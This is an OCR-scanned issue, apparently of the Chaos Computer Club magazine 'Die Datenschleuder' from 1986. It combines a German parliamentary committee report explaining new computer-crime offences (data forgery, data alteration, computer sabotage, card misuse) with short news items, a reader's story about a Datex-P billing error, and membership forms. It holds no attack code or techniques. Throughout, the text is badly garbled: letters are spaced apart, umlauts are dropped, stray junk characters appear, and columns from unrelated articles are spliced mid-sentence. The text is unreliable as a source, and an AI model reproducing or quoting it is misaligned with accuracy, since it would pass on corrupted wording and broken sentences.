(maschinellen) W e i t e r v e r a r b e i t u n g benutzt, w i e dies b e s o n d e r s i m Bank-, R e c h n u n g s - u n d Z a h l u n g s v e r k e h r d e u t l i c h wird.

UH?

lllll
Ii Ii
i I i i

in
m

Z u Artikel 1 N r . 5 288b S t G B Der Rechtsausschu empfiehlt mit Mehrheit, eine Strafvorschrift gegen d e n M i b r a u c h v o n Schecku n d Kreditkarten e i n z u f h r e n . Das Scheck- u n d K r e d i t k a r t e n s y s t e m h a t inzwischen zu einer auerordentlichen A u s w e i t u n g d e s bargeldlosen Z a h l u n g s v e r k e h r s g e f h r t u n d dad u r c h eine erhebliche volkswirtschaftliche Bedeut u n g e r l a n g t Das Scheckkarten ausstellende Kreditinstitut garantiert hierbei die E i n l s u n g v o n Schecks a u f speziellen zur Scheckkarte ausgegeben e n Scheckformularen bis z u e i n e m b e s t i m m t e n Betrag (zur Zeit 400 D M ) u n d n i m m t d a m i t d e m Schecknehm'er das R i s i k o eines ungedeckten Schecks ab. Das K r e d i t k a r t e n g e s c h f t i m Drei-Partner-System b e r u h t a u f d e m gleichen G r u n d g e d a n k e n . D a s Karten ausstellende I n s t i t u t verpflichtet sich gegen b e r d e m V e r t r a g s u n t e r n e h m e n , seine Forderungen gegen d e m K a r t e n i n h a b e r a u s z u g l e i c h e n . Dabei ist es b l i c h , d e m V e r t r a g s u n t e r r i e h m e n Jeweils u n t e r s c h i e d l i c h e O b e r g r e n z e n f r e i n z e l n e Geschfte z u setzen, bei d e r e n b e r s c h r e i t u n g Vert r a g s u n t e r n e h m e n bei Vorlage der K r e d i t k a r t e e i n e G e n e h m i g u n g des K r e d i t k a r t e n i n s t i t u t s e i n h o l e n m s s e n oder d i e E i n l s u n g s g a r a n t i e verlieren. Dan e b e n ist a u c h das Zwei-Partner-System gebruchlich. H i e r b e i r u m t e i n U n t e r n e h m e n m i t d e r Kreditkartenausgabe seinem K u n d e n lediglich einen f r a l l e F i l i a l e n g l t i g e n K u n d e n k r e d i t ein.

s
o 5 o

f. Hacker-ManvW inParis

oc r ^ i-

Eine Nacht der Hacker" ist in der vergjngcneri Woche von der PariserZeilung'L Monde* organisiert worden. Zehn |urige Informatik-

fans, so berichtet 'Le Monde'jetzt, seien unter der Aufsicht von drei Experten zwischen Mitternacht und stehen Uhr am frhen Morgen

inzwanziggrofte Datenbanken Europas und der U S A eingedrungen - so in die des britischen Veneidigungsministenums.

A u s h n l i c h e n E r w g u n g e n w i e b e i m Computerbet r u g h a t sich der Ausschu gegen d e n Vorschlag v o n H a f t i n der f f e n t l i c h e n A n h r u n g ( P r o t Nr. 26, S . 164, A n L S. 201) ausgesprochen, sich m i t einer blo e n E r g n z u n g des 267 S t G B z u b e g n g e n (Gedankenerkl&rungen k n n e n a u c h d a n n U r k u n d e n sein, w e n n sie computerlesbar gespeichert sind"). E i n e sich n u r auf eine E r g n z u n g des U r k u n d e n begriffs, sei es i n 267 S t G B oder in allen Urkundenstraftatbestnden, beziehende Gleichstellungsvorschrift w r d e andere T a t b e s t a n d s m e r k m a l e unangetastet lassen. Dies w r d e z u einer u n k l a r e n u n d wenig anschaulichen Tatbestandsumschreib u n g f h r e n (Wer . . . unechte computerlesbar gespeicherte G e d a n k e n e r k l r u n g e n . . . [bzw. Daten . . . ] speichert...), die d e m A u s s c h u n i c h t akzeptabel erscheint I m H i n b l i c k auf die i n Absatz 1 gegenber d e n Entw r f e n vorgeschlagene Erweiterung des Tatbestandes w u r d e die berschrift gendert. Absatz 1 w u r d e seinem I n h a l t u n d seiner Ausgestalt u n g n a c h n i c h t unwesentlich u m g e s t a l t e t Entsprec h e n d der P r f u n g s e m p f e h l u n g des Bundesrates stellt die N e u f a s s u n g sicher, d a d i e d e r Herstell u n g einer u n e c h t e n U r k u n d e entsprechende unzulssige S p e i c h e r u n g beweiserheblicher D a t e n d e m T a t b e s t a n d u n t e r f l l t D e m d a z u vorgelegten Form u l i e r u n g s v o r s c h l a g der B u n d e s r e g i e r u n g in ihrer G e g e n u e r u n g z u der S t e l l u n g n a h m e d e s Bundesrates ist d e r A u s s c h u allerdings n i c h t gefolgt Magebend d a f r war, d a dort z u r A b g r e n z u n g von s t r a f b a r e m u n d straflosem V e r h a l t e n u . a . weiter a u f unbefugtes" H a n d e l n abgestellt wird, dieser Begriff j e d o c h i n seiner B e d e u t u n g nicht vllig k l a r i s t D a r a u f h a t H a f t i n der ffentlichen A n h r u n g zu H e c h t h i n g e w i e s e n ( P r o t Nr. 26, A n L S.210). Die e i n e n g e n d e A u s l e g u n g , d i e der Regierungsentwurf d i e s e m M e r k m a l beilegt, k a n n i m H i n b l i c k auf eine weiterreichende B e d e u t u n g dieses M e r k m a l s i n and e r e n S t r a f v o r s c h r i f t e n n i c h t a l s gesichert betrachtet w e r d e n . U m z u v e r m e i d e n , d a von der n e u e n Strafvorschrift V e r h a l t e n s w e i s e n erfat werden, die bei ihrer V o r n a h m e i m Z u s a m m e n h a n g m i t der H e r s t e l l u n g oder V e r n d e r u n g eines Schriftstucks n u r eine sog. straflose schriftliche L g e darstellen, h a t der A u s s c h u d i e Vorschrift n e u g e s t a l t e t Entscheidend i s t d a D a t e n so ( n i c h t u n m i t t e l b a r w a h r n e h m b a r ) gespeichert oder v e r n d e r t w e r d e n , d a sie, w e n n sie als ausgedruckt o d e r wiedergegeb e n w a h r n e h m b a r w r e n , eine U r k u n d e n f l s c h u n g i. S. des 267 S t G B darstellen w u r d e n . M i t dieser ' A u s g e s t a l t u n g w i r d a u c h d e m A n l i e g e n von H a f t , d e n T a t b e s t a n d n i c h t von der G a r a n t i e f u n k t i o n , der A u s s t e l l e r e r k e n n b a r k e i t zu lsen ( P r o t Nr. 26, S. 168, A n L S . 209 f.), R e c h n u n g getragen. D u r c h die K o n s t r u k t i o n eines h y p o t h e t i s c h e n Vergleichs m i t F l l e n der U r k u n d e n f l s c h u n g i. S. des 267 S t G B w a r es a u c h n i c h t m e h r n o t w e n d i g , besonders herv o r z u h e b e n , d a v o m T a t b e s t a n d . n u r solche D a t e n e r f a t w e r d e n , die d a z u b e s t i m m t sind, bei e i n e r V e r a r b e i t u n g i m R e c h t s v e r k e h r als B e w e i s d a t e n f r rechtlich e r h e b l i c h e T a t s a c h e n b e n u t z t z u werd e n " (so die F o r m u l i e r u n g der E n t w r f e ) . D e r Zus a t z beweiserheblich" gibt i n v e r k r z t e r F o r m c .

diese A u s l e g u n g wieder. Aus der den Tatbestand des 267 S t G B e r g n z e n d e n F u n k t i o n des 269 S t G B w i e a u s seiner Ausgestaltung ergibt sich, d a nur solche beweiserheblichen Daten betroffen sind, die elektronisch, magnetisch oder sonst nicht unmittelbar w a h r n e h m b a r " gespeichert werden b z w . bei Tatbegehung schon entsprechend gespeichert waren. W i e b e i 263 a S t G B w u r d e a u f eine Verweisung a u f 2 0 2 a Abs. 2 S t G B abgesehen, d a 2 6 0 S t G B a u c h Flle erfat, i n d e n e n D a t e n eingegeben werden, also nicht n u r a n bereits gespeicherten Daten V e r n d e r u n g e n v o r g e n o m m e n w e r d e n (so n o c h die Entwrfe). Die Abstze men.

a u s l n d i s c h e Staaten h a b e n vergleichbare Regelung e n (USA, K a n a d a ) oder p l a n e n solche (sterreich, Schweiz). D a s geltende Recht reicht n i c h t aus. D i e A n w e n d b a r k e i t des 303 S t G B (Sachbeschdigung) ist u m s t r i t t e n u n d z u m i n d e s t n i c h t in allen Fallges t a l t u n g e n gesichert (zweifelnd z . B . Oertel, P r o t S. 183 t , 190). Das Vernichten oder V e r n d e r n v o n D a t e n w h r e n d der b e r m i t t l u n g s p h a s e wird z. B. von 303 S t G B nicht e r f a t Der vorgeschlagene Tatbestand lehnt sich i n seiner Ausgestaltung weitgehend an< 303 S t G B an. D u r c h A u f n a h m e verschiedener, sich teweise berschneidender T a t h a n d l u n g e n soll erreicht w e r d e n , d a alle rechtswidrigen Beeintrchtigungen d e r Verwendbarkeit von D a t e n erfat werden. D a b e i k a n n sich die Rechtswidrigkeit sowohl aus der Verletz u n g des Verfgungsrechts des Speichernden als auch aus der Verletzung von Interessen des v o m I n h a l t der D a t e n Betroffenen (vgL 41 B D S G ) ergeben.

schaftssabotage. W e r d e n z . B . B u c h f h r u n g u n d L o h n a b r e c h n u n g i n R e c h e n z e n t r e n lahmgelegt, so k a n n d i e s nicht n u r z u m wirtschaftlichen R u i n des Rechenzentrumsbetreibers, sondern auch der m i t d i e s e m z u s a m m e n a r b e i t e n d e n U n t e r n e h m e n fhr e n ( M o h r , D A T E V , P r o t Nr. 26, S. 181). Dabei ist a u c h a u f die Mglichkeit des u n b e f u g t e n Eindring e n s A u e n s t e h e n d e r hinzuweisen, die u- U. a u c h z u erheblichen Strungen fhren kann. I n der ffentlichen A n h r u n g ist das geltende R e c h t ( 303 S t G B ) u n d die i n den E n t w r f e n vorgeschlag e n e sich auf Beweisdaten beschrnkende nder u n g des 274 S t G B als unzureichend kritisiert w o r d e n ; dies gilt insbesondere f r d e n S t r a f r a h m e n des 303 S t G B (vgL M o h r u n d Oertel, P r o t S. 179 f f , 182 ff.; A n l . S. 36fL, 218 ff.), w e l c h e m derjenige des 303 a S t G B entspricht (Freiheitsstrafe bis z u zwei J a h r e n ) . M i t diesen T a t b e s t n d e n k a n n d e n Auswirk u n g e n e i n e r Computersabotage auf U n t e r n e h m e n u n d B e h r d e n (trotz 46 S t G B ) nicht hinreichend R e c h n u n g getragen werden. Sieber ( P r o t S. 177) h a t z w a r i m M o m e n t k e i n spezifisches Reformbedrfnis gesehen, aber selber e i n g e r u m t da bei Str u n g e n der D a t e n b e r t r a g u n g , bei Fehlbedienung e n der C o m p u t e r h a r d w a r e u n d sonstigen Eingriff e n i n betriebliche A b l u f e der Tatbestand der S a c h b e s c h d i g u n g bei der E r f a s s u n g der Betriebssabotage a u f Schwierigkeiten stt ( P r o t AnL S. 272). Bei der Entscheidung fr einen Sonder tat bestand der Computersabotage h a t der Ausschu di* Forder u n g e n nach e i n e m weitergehenden strafrechtlichen S c h u t z hochwertiger Wirtschafts- u n d Industriegter vor Sabotage durch einen Straftatbestand gegen Betriebssabotage n i c h t bersehen. Abgesehen von der Schwierigkeit, einen p r a k t i k a b l e n u n d ausreichend bestimmten Straftatbestand der Betriebssabotage zu bilden (vgl. auch den H i n w e i s v o n Sieber, P r o t AnL S.273), ist n a c h Ansicht des Ausschusses das derzeitige Bedrfnis fr die Bild u n g eines Sondertatbestandes der Computersabot a g e strker als das fr die E i n f h r u n g eines allgem e i n e n Sabotagetatbestandes. Angesichts der bei schweren Fllen von Computersabotage leicht vorstellbaren h o h e n Schden hlt der Ausschu es fr notwendig, eine Hchststrafe v o n f n f J a h r e n Freiheitsstrafe vorzusehen.

2 und 3 w u r d e n u n v e r n d e r t bernom-

270 S t G B T u s c h u n g i m Rechtsverkehr bei Datenverarbeitung

unverndert

Z u Artikel 1 Nr. 7 u n d 8 271,273 S t G B unverndert Z u Artikel 1 Nr. 9 274 S t G B Die Vorschrift w u r d e inhaltlich i m wesentlichen unverndert b e r n o m m e n . Die n d e r u n g e n u n d Erg n z u n g e n sind Folgenderungen. Der Begriff Daten wird d u r c h B e z u g n a h m e auf 202 a A b s . 2 S t G B i n Artikel 1 Nr. 2 b e i n g e g r e n z t D i e V e r w e n d i m g des M e r k m a l s beweiserheblich" ersetzt die Verweis u n g auf 260 S t G B . E s ist wie dort z u verstehen (vgL die B e g r n d u n g z u A r t i k e l 1 Nr. 6 2 6 9 S t G B ) . D i e E r g n z u n g der T a t h a n d l u n g e n d i e n t der A n g l e i c h u n g a n 303 a S t G B (Datenvernder u n g ) i n A r t i k e l l Nr. 9 b (vgL die dortigen Erluterungen). S i e verdeutlicht d e n in der h h e r e n Straf* d r o h u n g sich a u s w i r k e n d e n V o r r a n g d e r N u m m e r 2 g e g e n b e r 303 a S t G B . A u c h T a t h a n d l u n g e n , die d e m Beschdigten" in 274 Abs. 1 Nr. 1 S t G B entsprechen, w e r d e n n u n m e h r ausdrcklich e r f a t

Absatz 1
H a n d l u n g s o b j e k t sind alle n i c h t u n m i t t e l b a r wahrn e h m b a r e n D a t e n i. S. des 202 a Abs. 2 S t G B . D a s Lschen" v o n Daten, das d e m Zerstren einer Sache in 303 S t G B entspricht, m a c h t diese unwiederbringlich vollstndig u n k e n n t l i c h (vgL 2 Abs. i Nr. 4 B D S G ) . E i n Unterdrcken" von D a t e n liegt vor, w e n n diese d e m Zugriff Berechtigter entzogen u n d d e s h a l b nicht m e h r verwendet werden k n n e n ; i n s o w e i t g e h t 303 a S t G B ber 303 S t G B hinaus. U n b r a u c h b a r " sind Daten, w e n n sie (z. B. durch zustzliche E i n f g u n g e n , s o Sieber i n der verffentlichten erweiterten Fassung seines Gutachtens) so i n ihrer G e b r a u c h s f h i g k e i t beeintrchtigt werden, d a sie n i c h t m e h r o r d n u n g s g e m verwendet werd e n k n n e n u n d d a m i t i h r e n Zweck n i c h t m e h r e r f l l e n k n n e n . Das Verndern" von D a t e n erfaBt F u n k t i o n s b e e i n t r c h t i g u n g e n wie das in 2 Abs. 1 Nr. 3 B D S G g e n a n n t e inhaltliche Umgestalten, d u r c h d a s i h r Informationsgehalt bzw. Aussagewert g e n d e r t wird.

<5

o r C

s u

Z u Artikel 1 Nr. 9 a u n d 9 b 303 Abs. 3, 303 a, 303 b, 303 c S t G B

303 a StGB D a t e n v e r n d e r u n g
D e r A u s s c h u schlgt die A u f n a h m e eines in d e n E n t w r f e n n i c h t enthaltenen Tatbestandes gegen D a t e n v e r n d e r u n g " vor. Als Daten dargestellte Inf o r m a t i o n e n sollen dagegen geschtzt werden, d a i h r e V e r w e n d b a r k e i t beeintrchtigt oder beseitigt w i r d . C o m p u t e r d a t e n k n n e n einen h o h e n wirtschaftlichen W e r t haben. A u f G r u n d der wachsend e n A b h n g i g k e i t von i h n e n i n Wirtschaft u n d Verw a l t u n g u n d ihrer starken K o m p r i m i e r u n g ist e i n zustzlicher strafrechtlicher Schute erforderlich. Aufgegriffen werden d a m i t A n r e g u n g e n a u s der ffentlichen A n h r u n g (vgL M o h r u n d Oertel, P r o t Nr. 26 S. 180, 183t; A n l . S. 36ff, 218t). Sieber ( P r o t S. 177) s a h z w a r i m M o m e n t keine spezifischen Reformbedrfnisse, wies aber selber auf eine m g l i c h e Z u n a h m e solcher Delikte h i n ( P r o t S. 172). A u c h

I n Parallele z u 303 S t G B w i r d a u c h der Versuch f r strafbar e r k l r t

303 b StGB Computersabotage


D e r A u s s c h u schlgt die A u f n a h m e eines in d e n E n t w r f e n nicht e n t h a l t e n e n Tatbestandes gegen Computersabotage" vor, der S t r u n g e n der Datenv e r a r b e i t u n g i n Wirtschaft u n d V e r w a l t u n g durch Eingriffe in Daten oder S a b o t a g e h a n d l u n g e n gegen D a t e n t r g e r oder D a t e n v e r a r b e i t u n g s h a n d l u n g e n d a n n u n t e r Strafe s t e l l t w e n n die gestrte Datenv e r a r b e i t u n g f r d e n Geschdigten von wesentlicher B e d e u t u n g i s t D i e z u n e h m e n d e B e d e u t u n g u n d A b h n g i g k e i t von W i r t s c h a f t u n d V e r w a l t u n g v o n e i n e m strungsfreien F u n k t i o n i e r e n der Datenv e r a r b e i t u n g , insbesondere in Rechenzentren, rechtfertigt die E i n f h r u n g eines Tatbestandes gegen e i n e besonders gefhrliche Form der Wirt-

I m einzelnen ist folgendes zu bemerken:

Absatz 1
Strafbar m a c h t sich, wer eine fr einen fremden Betrieb, e i n fremdes U n t e r n e h m e n oder eine Behrde wesentliche Datenverarbeitung durch die in N u m m e r n ' 1 u n d 2 genannten konkreten Angriffsh a n d l u n g e n s t r t Der Begriff Datenverarbeitung" ist dabei weit auszulegen. Er u m f a t nicht nur d e n einzelnen Datenverarbeitungsvorgang, sondern a u c h d e n weiteren U m g a n g m i t D a t e n u n d deren Verwertung. Eingeschrnkt w i r d der Tatbestand dadurch, da die Datenverarbeitung von wesentlicher B e d e u t u n g " sein m u . D a m i t sind unter ander e m A n g r i f f e auf D a t e n (einschlielich ihrer Verarbeitung) e r f a t die in den Rechenzentren von Gro-

hl

D M D M ^ dsNl
u n t e r n e h m e n bzw. in Anlagen (einschlielich Datentrgern) gespeichert sind, welche die fr die Funktionsfhigkeit von Unternehmen bzw. Behrden zentralen Informationen enthalten. Sabotageakte von untergeordneter Bedeutung fallen hierdurch bereits von vornherein nicht unter den Tatbestand; Beeintrchtigungen der Funktionsfhigkeit von elektronischen Schreibmaschinen oder Taschenrechnern werden dadurch ausgeschieden. F r die A n w e n d u n g des Tatbestandes ist eine bloe Gefhrdung der Datenverarbeitung nicht ausreichend; vorliegen m u vielmehr eine nicht unerhebliche Beeintrchtigung des reibungslosen Ablaufs der genannten wesentlichen Datenverarbeitung. Eine Strung des Betriebes wie in 316 b S t G B wird jedoch nicht gefordert; eine zu starke E i n e n g u n g des Tatbestandes soll dadurch vermieden werden. Nicht strafbar m a c h t sich nach 3 0 3 b S t G B derjenige, welcher durch Handlungen nach N u m m e r n 1 oder 2 nur seine eigene Datenverarbeitung strt Greift er hierbei i n fremde Rechte ein, k a n n er insoweit n a c h 303 bzw. 303 a S t G B bestraft werden. Hinsichtlich der einzelnen Angriffsmittel unterscheidet Absatz 1 zwischen verschiedenen Tatobjekten.
b 1 0 0 DM S C , 0 0 DM - 0 , 0 0 DM 6 0 , 0 0 DM

e i f l ODO b r i n g t Unbekai
LebPn^ilJ ds ndei

diPE-dsHa

t?l T e. i 1 1 Parto/Verp.

303 / I i s . J; 303 c StGB

Strafantrag

Wie der bisherige 303 S t G B w e r d e n die 303 a u n d 303 b S t G B g r u n d s t z l i c h als A n t r a g s d e l i k t ausgestaltet A u s n a h m s w e i s e k a n n in F l l e n besonderen ffentlichen Interesses e i n S t r a f v e r f a h r e n auch ohne S t r a f a n t r a g d u r c h g e f h r t w e r d e n . D i e Identitt der Regelung fr d i e 5 303 b i s 303 b S t G B h a t den Ausschu bewogen, diese i m A n s c h l u d a r a n in einen neuen 303 c S t G B a u f z u n e h m e n (vgl. als Parallele 205 S t G B ) . Die A u f h e b u n g des 303 Abs. 3 S t G B stellt d a z u eine F o l g e n d e r u n g dar.

Kurzmeldungen
( B i l d : H a r a l d , a u s taz) C Atom-Kataster Ein strsicheres Strahlungsmeprogramm auf Heimcomputern wie V C 2 0 und C 6 4 fahren mehrere Brgerinitiativen. Derzeit werden erst ein paar der bundesdeutschen Atomkraftwerke berwacht. V o r T s c h e r n o b y l w u r d e n d i e s e mit C o m p u t e r n a r b e i t e n d e n Initiativen oft g e n a u s o a r g w h nisch betrachtet wie d i e A t o m k r a f t w e r k e . Jetzt ist d a s V e r h l t n i s e n t s p a n n t . A l s H a r d w a r e v o r Ort dient ein V C 2 0 mit Datasette, D r u c k e r , E c h t z e i t u h r , Netz- u n d Batteriebetrieb. A m U s e r o o r t h n g e n M e f h l e r fr W i n d , W e t ter und Strahlung. Ein C 6 4 bildet das rtliche Kleinarchiv, eine 5 2 0 e r Aufrstung teils In Planung. Z u m mobilen Mekit gehrt Kompa mit Visiereinrichtung auf Kamerastativ: Khlturm bekannten Formats anpeilen, dann Standortbestimmung auf Metischblatt. Wettermessung ist eine wichtige Voraussetzung fr verlliche Strahlungsdaten. Feinmechaniker stellten bentigte Przisionsteile bei befreundeten Firmen her. Der Batteriebetrieb ermglicht nahezu strungsfreien Betrieb auch bei Ausfllen des Stromnetzes. M e d a t e n w e r d e n archiviert u n d b u n d e s w e i t ausgewertet. Derzeit b i l d e n s i c h a n v e r s c h i e d e n e n a n d e r e n S t a n d o r t e n d e r K e r n s p a l t u n g in d e n Brgerinitiativen w e i t e r e M e - I n i t i a t i v e n mit d e m Ziel, ein b u n d e s w e i t e s f f e n t l i c h e s A t o m k a t a s t e r z u erstellen. ( c r d 8 6 0 6 2 9 1 7 0 0 )

(Bild u m g e s g t e r E - M a s t ) Stillstand nach Stromausfall "Sgende Sofortabschalter", die - abgesehen von dar Gesetzeslage - teilweise ziemlich leichtsinnig Strammasten umlegen (immerhin AKW-Notabschalttest, dazu zehntausende Volt Schrittspannung) veranlaten krzlich einige Hamburger Grorechenzentren, ihre Wiederanlauffhigkeit nach Kurzzeitstromausfall zu testen. Bei zumindest zwei Rechenzentren erwies sich d a s System als verbesserungsbedrftig. ( c r d 8 6 0 6 2 9 1 7 0 2 )

Nummer 1 nennt als Sabotagehandlung eine rechtswidrige Datenvernderung i. S. v o n 303 a Abs. 1


StGB. Eine Tat nach Absatz 1 Nr. 1 stellt insoweit eine Qualifikation zu 303 a S t G B dar.

6.
q
3 M

a> s iliftl
/

Rallafijortr Illing dr llipHiehan Msdu[Funktion

Nummer 2 knpft bei der N e n n u n g weiterer a n Da0) tenverarbeitungsanlagen oder Datentrgern begangenen Sabotagehandlungen a m Tatbestand der Sachbeschdigung ( 303 S t G B ) u n d a n Sabotagestraftatbestnde des Strafgesetzbuches an ( 87 U Abs. 2 Nr. 2; 100 e Abs. 1: 145 Abs. 2 Nr. 2; 316 b, 317), womit auch eine Angleichung a n N u m m e r 1 i. V. m. den in 303 a S t G B genannten Tathandlungen erfolgt Die Begriffe Zerstren" u n d Beschdigen" decken sich m i t denen des 303 StGB. D i e genannten Gegenstnde sind beseitigt", w e n n sie aus dem Verfgungs- oder Gebrauchsbereich des c Berechtigten entfernt sind. Sie sind unbrauchbar", 0) wenn ihre Gebrauchsfhigkeit so stark beeintrchtigt wird, da sie nicht m e h r o r d n u n g s g e m verwendet werden knnen, u n d verndert", w e n n e i n G vom bisherigen abweichender Z u s t a n d herbeigefhrt wird. Der Ausschu h a t sich d a f r entschieden, die N u m m e r 2 nicht n u r als qualifizierte Sachbeschdigung auszugestalten. A u c h d a n n , w e n n H sich die einzelnen T a t h a n d l u n g e n gegen eigene 0) Sachen richten, soll die N u m m e r 2 a n w e n d b a r sein, w e n n dadurch die wesentliche D a t e n v e r a r b e i t u n g eines dem Tter n i c h t gehrenden U n t e r n e h m e n s oder einer Behrde gestrt wird. F r d i e N u m m e r 1 U lassen sich hnliche Ergebnisse d u r c h e i n e entsprechende Auslegung des 303 a S t G B erreichen,

3
o

T3

Fnf J a h r e C h a o s E n d e o-f-fen Vor g e n a u 5 J a h r e n (11./12. September 198 i) f and i n Berl i n das erste Treffen des CCC s t a t t . "Mitraut Aktentaschen und Kartons" war die ber sehr i f t ei ner BerI iner Tageszei tung damals. Sei t Frhjhr 1984 g i b t es d i e datenschleuder. Angefangen hat es mit vier S e i t e n A4, d i e j e t z i g e Ausgabe um-f a t i m m e r h i n 1 6 S e i t e n . Die kleine Sehri f t (di chtgepac kte I n f o r m a t i on) brachte Gerchte, wi r wrden vom Opt i kerverband u n t e r s t t z t . Das regelmige Erscheinen wurde trotz guter Vorsatze bi sher n i c h t errei cht t gelegentlich wurde die ds schon totgeglaubt.

Absatz 2
Wie bei den 303,303 a S t G B u n d d e n Sabotagetatbestnden der 316 b, 317 S t G B w i r d d e r Versuch

fr strafbar erklrt

Eintreffende Briefe mit bsen Forderungen und Drohungen zB wegen "Ni cht1i e f e r u n g " von A b o u s w . werden mit Verweis auf das Chaos und Rckerstattung beantwortet. Die ds erscheint fter, wenn konstruktivere Textbeitrge hier eingehen. Wir t u n unser bestes, auch wenn es manchen nicht reicht. Finanzielle Bereicherung , wie Unwissende unterstellen, liegt nicht vor. Wir brauchen im Gegenteil Spenden. E s g i b t kaum n o c h Zeitschriften, di nicht von Werbung abhngig sind, Di 9 datenschleuder i st abhngig und f r e u e n uns U n t e r sttz u n a . von Lesern ber jede ds-red.

Welcher Kopple rbesitzer hat noch nicht mit dam Gedanken espielt sich auch einmal im Dalex P-Netz der Deutschen undespost zu versuchen ?1 So auch ich. Also nichts wi ran ans Telefon, Fernmeldeamt angerufen und ein Antragsformular fr eine Network-User-Idsntifikation (NUI) beantragt. Nach zwei falschen Antragsformularen kam dann auch nach ca. 10 tagen da heiersehnte Papier, Ausfllen und wieder abschicken wurde auf der Stelle erledigt. Als die NUI dann nach einiger Zeit per Einschreiben zugestellt wurde, konnte ich es gar nicht abwanen den Rechner einzuschalten. Kurz nochmal die mitgespeicherte Datex P-Anleitung einer der Maifboxen 'durchgelesen, ein paar NUA's (Network-UserAdress) aus derselben Mailbox notiert, und dann gings los, Doch was ist das ?? Da will doch dieser blde Rechner, der in diesem Fall in England stand, auch noch einen Usernamen und ein Passwort wissen. Nach einigen Fehlversuchen probierte ich es in den USA. aberdie wollten ihre Daten auch nicht kostenlos herausgeben. Da stand ich nun mit meinem Latein und meiner NUI. Da mein Englischkenntnisse auch nicht gerade die eines Englnders waren, gab ich es erstmal wieder auf. Ich sagte mir, die 15 DM im Monat ward ich auch noch verkraften, vielleicht lern ich in sachen Datex ja nochmal was dazu, und dann knnte ich die NUI sicher nochmal gebrauchen. Als ich nun nach zwei Monaten immer noch kein Gebhrenabrechnung vom Fernmeldeamt bekommen hatte, wunderte ich mich zwar, dachte mir aber nichts dabei. Der groe Schock kam erst nach gut drei Monaten. Und zwar in Form einer Fernmelderachnung ber 1090.13 DM. Da mute ich erstmal schlucken. Als sich die ersten Schluckkrmpfe gelegt hatten rief ich natrlich sotort bei der Fernmelderechnungsstelle an um die Rechnung berprfen zu lassen. Die Dame am Telefon wusste allerdings nichts von so einer Rechnungssumme. Lediglich eine Summe von ca. 80.- DM sei ihr bekannt. Nun, das hrte sich ja schon ganz gut an, mit etwa so einer Summe hatte ich auch gerechnet Doch pltzlich verwandelte sich meine Erleichterung in die bekannten Schiuckstrungen. Die freundliche Dame teilte mir mit da da nachtrglich noch etwas Von Hand' auf meiner Rechnung gendert worden wre (was immer das auch heien mochte). Sie verwies mich dann an die zustndige Stelle fr Datex-P. Die konnten mir aber leider auch nicht helfen, wollten aber, wenn ich gleich vorbeikommen wrde, meine NUI noch am selben Tag sperren. Ich also hin, NUI zu sofort gekndigt und gefragt was ich denn nun machen knne. Man sagte mir da man versuchen wollte die Gebhren zu berprfen. Mit der Versicherung da die NUI noch am gleichen Tag gesperrt wrde fuhr icn also wieder nach Hause. Al3 ich nach etwa einer Woche immer noch nichts vom Fernmeldeamt gehrt hatte kam mir Samstagnachmittag beim Frhstcken der Gedanke mal den Pd anzurufen und die NUI auszuprobieren. Ich dachte mich tritt ein Pferd.:Teilnehmerkennung DTAMMANY aktiv III Daraufhin probierte ich natrlich noch mehrere Male und bekam bis Montagmorgen noch die Aktivmeldung. Auf den sofortigen Anruf beim Fernmeldeamt wurde mir geantwortet da man NUl's nur von Sonntag auf Montag sperren knne und am letzten Sonntag die dafr bentigten 'Speicherpltze' schon belegt gewesen wren.... Nach ca. vier Wocnen bekam ich dann einen Anruf vom Fernmeldeamt in dem man mir mitteilte da mir die Gebhrenaufstallung die ich beantragt hatte nicht zustellen knne, mir bliebe aber freigestellt die Aufstellung im Amt einzusehen. Jenes wrde aber nochmal zwei wochen dauern, da die Aufstellung noch nicht da sei. Nach abermalsdrei Wochen klingeltedann endlich das Telefon. Ziemlich kleinlaut erklrte mir die Dame am Apparat da man angewiesen worden wre mir 990.- DM zu erstatten, da im Datex-System ein Softwarefehlar gewesen wre. Was das nun ist wute sie natrlich nicht und sie hatte von Datex-P natrlich auch keine Ahnung, da mte ich mich schon an die dafr zustndige Stelle wenden Ich legte dann auf und

NUI OFF

dachte darber nach was wohl einige grere Firmen gemacht haben die diesem 'Softwarefenler zum Opfer fielen ? So ein Fehler tritt ja nicht nur bei einem auf. Ich nehme an sie haben ihren Mitarbeitern gesagt sie sollen nicht soviel telefonieren (wenn ihnen die erhhte Summe berhaupt aufgefallen Ist) und haben ohne zu zgern die Rechnung bezahlt.
nuioff.wa 19860418 1900 SSB/Sy

Fr d i e T e i l n a h m e a m Chaos Communication

Center

I c h / W i r wollen Teilnehmer auf dem Chaos Communication Center, der Club-Mailbox, werden, (nur mit Einzugsermchtigung) Benutzername: (max. 15 Stellen, nur A Z als erstes Zeichen, danach Telexzeichenvorrat ohne Umlaufe). Kennwort zur Einrichtung: (mindestens 6 Stellen) Bei Teilnahme erkenne Ich die Nutzungsbedingungen fr das Chaos Communication Center an. Die Nutzungsgebhren von mindestens D M 8, werden monatlich abgebucht. Unterschrift, bei Minderjhrigen die des gesetzlichen Vertreters

XJS
SatenMiIeuber
Das wissenschaftliche Fachblatt fr Datenreisende
Em O'yan O>aos Computer Club

Das' wissenschaftliche Fachblatt fr Dalenrelsende~


Em O r g a n dus Cnaos Computer C l ^ b

^lUCII^tlllCUDCV r
DV-untersttzter Informationsaustausch Auf der Basis der Erfahrung mit Mailbox-Systemen in den USA, die dort grenzberschreitend Informationsaustausch fr Oppositionsgruppen betreiben, sollen diese auch in Deutschland verstrkt genutzt werden. Insbesondere die Koordinationserfahrungen> die man mit der Datenkommunfka Hon in den USA fr Besetzungsplanung von ffentlichen Gebvden'm ber 30 Stdten gewonnen hatte, hat die linke Szene in der Bundesrepublik aufmerken lossen. Auf schnellstem W e g e hatten bei dieser spektakulren Aktion die Besetzer untereinander Informationen austauschen knnen und ihr Verhalten gegenber den Sicherheitsbehrden koordiniert. Aus: SICHERHEITS-BERA TER, S. 133(Handelsblattverlach)

Chaos Communication Center - Fragen & Antworten


Wie komm* ich auf die nur als Mitglied durch A n t r a g (siehe rechts) ich brauche ein Girokonto
Durch A n t r a g (siehe rechts)

CCC-Mai/box?

W i e werde ich Mitglied? W a s wollt ihr?

aktive Mitarbeit und/oder Untersttzung zwonzig M a r k Aufnahmegebhr (Verwaltung) von Schlern und Studenten sechzig Mark im Jahr von anderen einhundertzwanzig Mark im Jahr

I I
:o i_ C C - I i -o

W a r u m brauche Ich ein Girokonto?

E e
e a
HI

o 0 - E 9) o o o wuCN fl> p-i s - s o " O S .O O < e I- w 'c S


t 0)

Ec

